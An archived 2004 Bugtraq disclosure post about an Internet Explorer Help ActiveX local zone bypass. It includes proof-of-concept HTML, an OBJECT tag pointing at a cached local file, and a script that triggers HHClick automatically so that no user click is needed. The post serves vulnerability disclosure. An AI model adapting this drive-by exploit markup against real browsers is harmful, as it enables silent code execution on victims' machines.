lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20041219171830.9838.qmail@www.securityfocus.com>
Date: 19 Dec 2004 17:18:30 -0000
From: Paul <paul@...yhats.cjb.net>
To: bugtraq@...urityfocus.com
Subject: Internet Explorer Help ActiveX Control Local Zone Security
    Restriction Bypass Vulnerability (updated)




I appologize for the previous vulnerability (longnamevuln) because it was incomplete. After realizing my mistake, longnamevuln looked useless. However, it was just incomplete, not useless. What longnamevuln did was open a local file in the browser window. To execute active content, it needed to be opened in the help window. To do this, a window name parameter set to a blank window needed to be added. The updated code is designed for Malware's original local zone security restriction bypass which required the user click a button (http://malware.com/noceegar.html). The drag and drop vulnerability does not appear to be functional; however, the local zone security bypass vulnerability still appears to work fine. Instead of this (malware's code):

&lt;OBJECT id="hhctrl" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"codebase="hhctrl.ocx#Version=5,2,3790,1194"width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;">
<PARAM name="Command" value="Index">
<PARAM name="Item1" value="cigar.hhk">
&lt;/OBJECT&gt;  

one would use this (my code):

&lt;OBJECT id="hhctrl" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"codebase="hhctrl.ocx#Version=5,2,3790,1194"width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;C:\WINDOWS\PCHealth\malwarez[1].htm">
&lt;/OBJECT&gt;
&lt;script&gt;
hhctrl.HHClick();
&lt;/script&gt;

Notice that HHClick is automated, eliminating the need for user interaction (finally). My site, http://greyhats.cjb.net, will not be updated with the new code because it is a small change, and I don't want to go through the hassle of trying to deal with the ftp server on my unreliable host (hope websamba isnt reading this :).

That's all folks!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ